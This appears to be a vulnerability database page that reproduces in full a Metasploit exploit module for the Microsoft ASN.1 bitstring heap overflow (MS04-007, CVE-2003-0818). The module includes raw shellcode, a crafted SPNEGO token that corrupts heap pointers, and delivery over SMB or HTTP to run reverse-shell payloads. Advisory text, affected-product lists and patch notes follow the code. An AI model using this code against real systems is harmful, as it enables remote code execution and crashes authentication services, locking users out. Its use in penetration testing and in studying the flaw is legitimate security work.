This is an exploit for a previously undisclosed vulnerability in the bit string decoding code in the Microsoft ASN.1 library. This vulnerability is not related to the bit string vulnerability described in eEye advisory AD20040210-2. Both vulnerabilities were fixed in the MS04-007 patch. You are only allowed one attempt with this vulnerability. If the payload fails to execute, the LSASS system service will crash and the target system will automatically reboot itself in 60 seconds. If the payload succeeeds, the system will no longer be able to process authentication requests, denying all attempts to login through SMB or at the console. A reboot is required to restore proper functioning of an exploited system. This exploit has been successfully tested with the win32/*/reverse_tcp payloads, however a few problems were encounted when using the equivalent bind payloads. Your mileage may vary.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::SMB

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Microsoft ASN.1 Library Bitstring Heap Overflow',
			'Description'    => %q{
				This is an exploit for a previously undisclosed
				vulnerability in the bit string decoding code in the
				Microsoft ASN.1 library. This vulnerability is not related
				to the bit string vulnerability described in eEye advisory
				AD20040210-2. Both vulnerabilities were fixed in the
				MS04-007 patch.

				You are only allowed one attempt with this vulnerability. If
				the payload fails to execute, the LSASS system service will
				crash and the target system will automatically reboot itself
				in 60 seconds. If the payload succeeeds, the system will no
				longer be able to process authentication requests, denying
				all attempts to login through SMB or at the console. A
				reboot is required to restore proper functioning of an
				exploited system.
				
				This exploit has been successfully tested with the win32/*/reverse_tcp
				payloads, however a few problems were encounted when using the
				equivalent bind payloads. Your mileage may vary.
					
			},
			'Author'         => [ 'Solar Eclipse <solareclipse@phreedom.org>' ],
			'License'        => GPL_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2003-0818'],
					[ 'OSVDB', '3902' ],
					[ 'BID', '9633'],
					[ 'URL', 'http://www.phreedom.org/solar/exploits/msasn1-bitstring/'],
					[ 'MSB', 'MS04-007'],

				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread'
				},				
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1024,
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					[ 
						'Windows 2000 SP2-SP4 + Windows XP SP0-SP1', # Tested OK - 11/25/2005 hdm (bind failed)
						{
							'Platform' => 'win',
						},
					],
				],
			'DisclosureDate' => 'Feb 10 2004',
			'DefaultTarget' => 0))
			
		register_options(
			[
				OptString.new('PROTO', [ true,  "Which protocol to use: http or smb", 'smb']),
			], self.class)			
	end

	# This exploit is too destructive to use during automated exploitation.
	# Better Windows-based exploits exist at this time (Sep 2006)
	def autofilter
		false
	end

	# This is a straight port of Solar Eclipse's "kill-bill" exploit, published
	# as a Metasploit Framework module with his permission. This module is only
	# licensed under GPLv2, keep this in mind if you embed the Framework into
	# a non-GPL application. -hdm[at]metasploit.com

	def exploit
	
		# The first stage shellcode fixes the PEB pointer and cleans the heap
		stage0 = 
			"\x53\x56\x57\x66\x81\xec\x80\x00\x89\xe6\xe8\xed\x00\x00\x00\xff"+
			"\x36\x68\x09\x12\xd6\x63\xe8\xf7\x00\x00\x00\x89\x46\x08\xe8\xa2"+
			"\x00\x00\x00\xff\x76\x04\x68\x6b\xd0\x2b\xca\xe8\xe2\x00\x00\x00"+
			"\x89\x46\x0c\xe8\x3f\x00\x00\x00\xff\x76\x04\x68\xfa\x97\x02\x4c"+
			"\xe8\xcd\x00\x00\x00\x31\xdb\x68\x10\x04\x00\x00\x53\xff\xd0\x89"+
			"\xc3\x56\x8b\x76\x10\x89\xc7\xb9\x10\x04\x00\x00\xf3\xa4\x5e\x31"+
			"\xc0\x50\x50\x50\x53\x50\x50\xff\x56\x0c\x8b\x46\x08\x66\x81\xc4"+
			"\x80\x00\x5f\x5e\x5b\xff\xe0\x60\xe8\x23\x00\x00\x00\x8b\x44\x24"+
			"\x0c\x8d\x58\x7c\x83\x43\x3c\x05\x81\x43\x28\x00\x10\x00\x00\x81"+
			"\x63\x28\x00\xf0\xff\xff\x8b\x04\x24\x83\xc4\x14\x50\x31\xc0\xc3"+
			"\x31\xd2\x64\xff\x32\x64\x89\x22\x31\xdb\xb8\x90\x42\x90\x42\x31"+
			"\xc9\xb1\x02\x89\xdf\xf3\xaf\x74\x03\x43\xeb\xf3\x89\x7e\x10\x64"+
			"\x8f\x02\x58\x61\xc3\x60\xbf\x20\xf0\xfd\x7f\x8b\x1f\x8b\x46\x08"+
			"\x89\x07\x8b\x7f\xf8\x81\xc7\x78\x01\x00\x00\x89\xf9\x39\x19\x74"+
			"\x04\x8b\x09\xeb\xf8\x89\xfa\x39\x5a\x04\x74\x05\x8b\x52\x04\xeb"+
			"\xf6\x89\x11\x89\x4a\x04\xc6\x43\xfd\x01\x61\xc3\xa1\x0c\xf0\xfd"+
			"\x7f\x8b\x40\x1c\x8b\x58\x08\x89\x1e\x8b\x00\x8b\x40\x08\x89\x46"+
			"\x04\xc3\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea"+
			"\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x38\x49\x8b\x34\x8b\x01\xee"+
			"\x31\xff\x31\xc0\xfc\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb"+
			"\xf4\x3b\x7c\x24\x24\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b"+
			"\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc2"+
			"\x08\x00\xeb\xfe"

		token = spnego_token(stage0, payload.encoded)
		
		case datastore['PROTO']
			when 'smb'
				exploit_smb(token)
			when 'http'
				exploit_http(token)
			else
				print_status("Invalid application protocol specified, use smb or http")
		end
	end
	
	
	def exploit_smb(token)
		connect
		
		client = Rex::Proto::SMB::Client.new(sock)

		begin
			client.session_request(smb_hostname()) if not datastore['SMBDirect']
			client.negotiate
			client.session_setup_ntlmv2_blob(token)
		rescue => e
			if (e.to_s =~ /error code 0x00050001/)
				print_status("The target system has already been exploited")
			else
				print_status("Error: #{e}")
			end
		end
		
		handler
		disconnect
	end
	
	def exploit_http(token)
		connect
		
		req = "GET / HTTP/1.0\r\n"
		req << "Host: #{ datastore['RHOST']}\r\n"
		req << "Authorization: Negotiate #{Rex::Text.encode_base64(token, '')}\r\n\r\n"

		sock.put(req)
		res = sock.get_once
		
		if (res and res =~ /0x80090301/)
			print_status("This server does not support the Negotiate protocol or has already been exploited")
		end
		
		if (res and res =~ /0x80090304/)
			print_status("This server responded with error code 0x80090304 (wth?)")
		end		
		
		handler
		disconnect
	end
	

	# Returns an ASN.1 encoded string
	def enc_asn1(str)
		Rex::Proto::SMB::Utils::asn1encode(str)
	end

	# Returns an ASN.1 encoded bit string with 0 unused bits
	def enc_bits(str)
		"\x03" + enc_asn1("\x00" + str)
	end

	# Returns a BER encoded constructed bit string
	def enc_constr(*str_arr)
		"\x23" + enc_asn1(str_arr.join(''))
	end

	# Returns a BER encoded SPNEGO token
	def spnego_token(stage0, stage1)
		
		if !(stage0 and stage1)
			print_status("Invalid parameters passed to spnego_token")
			return
		end
		
		if (stage0.length > 1032)
			print_status("The stage 0 shellcode is longer than 1032 bytes")
			return
		end
		
		tag = "\x90\x42\x90\x42\x90\x42\x90\x42"
		
		if ((tag.length + stage1.length) > 1033)
			print_status("The stage 1 shellcode is too long")
			return
		end
		
		
		# The first two overwrites must succeed, so we write to an unused location
		# in the PEB block. We don't care about the values, because after this the
		# doubly linked list of free blocks is corrupted and we get to the second
		# overwrite which is more useful.

		fw = "\xf8\x0f\x01\x00"		# 0x00010ff8
		bk = "\xf8\x0f\x01"
				
		# The second overwrite writes the address of our shellcode into the
		# FastPebLockRoutine pointer in the PEB

		peblock = "\x20\xf0\xfd\x7f" # FastPebLockRoutine in PEB
			
		bitstring = enc_constr( 
			enc_bits("A" * 1024),
			"\x03\x00",
			enc_constr(
				enc_bits(tag + stage1 + ("B" * (1033-(tag+stage1).length))),
				enc_constr( enc_bits(fw + bk) ),
				enc_constr(
					enc_bits("CCCC" + peblock + stage0 + ("C" * (1032-stage0.length))),
					enc_constr(
						enc_bits("\xeb\x06" + make_nops(6)),
						enc_bits("D" * 1040)
					)
				)
			)
		)
		
		token = "\x60" + enc_asn1(                 # Application Constructed Object
			"\x06\x06\x2b\x06\x01\x05\x05\x02" +   # SPNEGO OID
			"\xa0" + enc_asn1(					   # NegTokenInit (0xa0)
				"\x30" + enc_asn1(
					"\xa1" + enc_asn1(
						bitstring
					)
				)
			)
		)
		
		return token	
	end

end
    

- 漏洞信息

3902
Microsoft Windows ASN.1 Library Integer Overflow
Local Access Required, Remote / Network Access Authentication Management, Input Manipulation, Race Condition
Loss of Integrity
Exploit Public, Exploit Commercial Vendor Verified

- 漏洞描述

A vulnerability exists in the ASN.1 protocol library used by the Windows operating system. This flaw allows a hostile BITSTRING ASN.1 sequence to overwrite sections of heap memory remotely through any service which parses ASN.1 data. Examples of affected services include NetBIOS, SMB, IPSEC, Kerberos, SSL, and IIS. With a specially crafted request, an attacker can execute code with the privileges of the processing component, resulting in a loss of integrity.

- 时间线

2004-02-10 Unknow
2004-02-10 2004-02-10

- 解决方案

Microsoft has released a patch to address this vulnerability, there are currently no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Microsoft Windows ASN.1 Library Bit String Processing Variant Heap Corruption Vulnerability
Boundary Condition Error 13300
Yes No
2005-04-21 12:00:00 2009-07-12 02:06:00
Discovery of this vulnerability has been credited to Solar Eclipse.

- 受影响的程序版本

Yahoo! Messenger 5.6 .0.1358
Yahoo! Messenger 5.6 .0.1356
Yahoo! Messenger 5.6 .0.1355
Yahoo! Messenger 5.6 .0.1351
Yahoo! Messenger 5.6 .0.1347
Yahoo! Messenger 5.6
Yahoo! Messenger 5.5 .1249
Yahoo! Messenger 5.5
VanDyke SecureCRT 4.0.5
VanDyke SecureCRT 4.0.4
VanDyke SecureCRT 4.0.3
VanDyke SecureCRT 4.0.2
VanDyke SecureCRT 4.0.1
Musicmatch Inc. Musicmatch Jukebox 8.2
Musicmatch Inc. Musicmatch Jukebox 8.1
Musicmatch Inc. Musicmatch Jukebox 8.0
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP 64-bit Edition Version 2003 SP1
Microsoft Windows XP 64-bit Edition Version 2003
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP 64-bit Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows NT Terminal Server 4.0 SP5
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP6a
+ Avaya DefinityOne Media Servers
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
+ Avaya S8100 Media Servers 0
Microsoft Windows NT Server 4.0 SP6
Microsoft Windows NT Server 4.0 SP5
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows 98SE
Microsoft Windows 98
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
JASC Software PaintShop Pro 8.10
JASC Software PaintShop Pro 8.0 1
JASC Software PaintShop Pro 8.0 0
JASC Software PaintShop Pro 7.0 4
JASC Software PaintShop Pro 7.0 2
JASC Software PaintShop Pro 7.0 1
JASC Software PaintShop Pro 7.0
JASC Software PaintShop Pro 6.0 2
JASC Software PaintShop Pro 6.0 1
JASC Software PaintShop Pro 6.0
JASC Software PaintShop Pro 5.0 3
JASC Software PaintShop Pro 5.0 1
JASC Software PaintShop Pro 5.0
Intuit TurboTax 2003
Intuit Quicken 2003
AOL Instant Messenger 5.5.3415 Beta
AOL Instant Messenger 5.2.3292
AOL Instant Messenger 5.1.3036
AOL Instant Messenger 5.0.2938
Altova xmlspy Professional Edition 2004 R2
Altova xmlspy Professional Edition 2004
Altova xmlspy Home Edition 2004 R2
Altova xmlspy Home Edition 2004
Altova xmlspy Enterprise Edition 2004 R2
Altova xmlspy Enterprise Edition 2004
Adobe Acrobat 6.0
Adobe Acrobat 5.0.5
Adobe Acrobat 5.0

- 漏洞讨论

Microsoft ASN.1 handling library has been reported prone to a heap corruption vulnerability. The issue presents itself in the ASN.1 bit string decoding routines, specifically the BERDecBitString() function. The issue manifests when the affected function attempts to process a constructed bit string that contain another nested constructed bit string.

This vulnerability is exposed in a number of security related operating system components, including Kerberos (via UDP port 88), Microsoft IIS with SSL support enabled and NTLMv2 authentication (via TCP ports 135, 139 and 445). Other components may also be affected, though a comprehensive list is not available at this time. Client applications, which use the library, will be affected, including LSASS.EXE and CRYPT32.DLL (and any application that relies on CRYPT32.DLL). The vulnerable library is used frequently in components that handle certificates such as Internet Explorer and Outlook. Handling of signed ActiveX components could also present an exposure.

It should be noted that because ASN.1 data will likely be encoded, for example Kerberos, SSL, IPSec or Base64 encoded, the malicious integer values may be obfuscated and as a result not easily detectable.

Issues related to this vulnerability were originally covered in BID 9626 and 9743, further information has been made available which identifies that this is a distinct vulnerability in the library and so this specific issue has been assigned an individual BID.

** June 5, 2005 Update: An IRC bot style tool may be exploiting this vulnerability. This alert will be updated as further information becomes available.

- 漏洞利用

The following proof of concept exploits are available:

- 解决方案

It is reported that computers that have the patches associated with Microsoft security bulletin MS04-007 installed are not vulnerable to this issue. Symantec has confirmed this information.


Microsoft Windows 2000 Server SP2

Microsoft Windows 2000 Advanced Server SP2

Microsoft Windows NT Server 4.0 SP6a

Microsoft Windows Server 2003 Enterprise Edition Itanium 0

Microsoft Windows NT Terminal Server 4.0 SP6

Microsoft Windows Server 2003 Standard Edition

Microsoft Windows XP Professional

Microsoft Windows Server 2003 Datacenter Edition Itanium 0

Microsoft Windows NT Workstation 4.0 SP6a

Microsoft Windows XP 64-bit Edition SP1

Microsoft Windows Server 2003 Datacenter Edition

Microsoft Windows 2000 Advanced Server SP4

Microsoft Windows 2000 Professional SP3

Microsoft Windows Server 2003 Enterprise Edition

Microsoft Windows 2000 Professional SP2

Microsoft Windows Server 2003 Web Edition

Microsoft Windows 2000 Advanced Server SP3

Microsoft Windows XP Home

Microsoft Windows XP Home SP1

Microsoft Windows XP 64-bit Edition Version 2003 SP1

Microsoft Windows 2000 Server SP3

Microsoft Windows XP 64-bit Edition Version 2003

Microsoft Windows XP 64-bit Edition

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站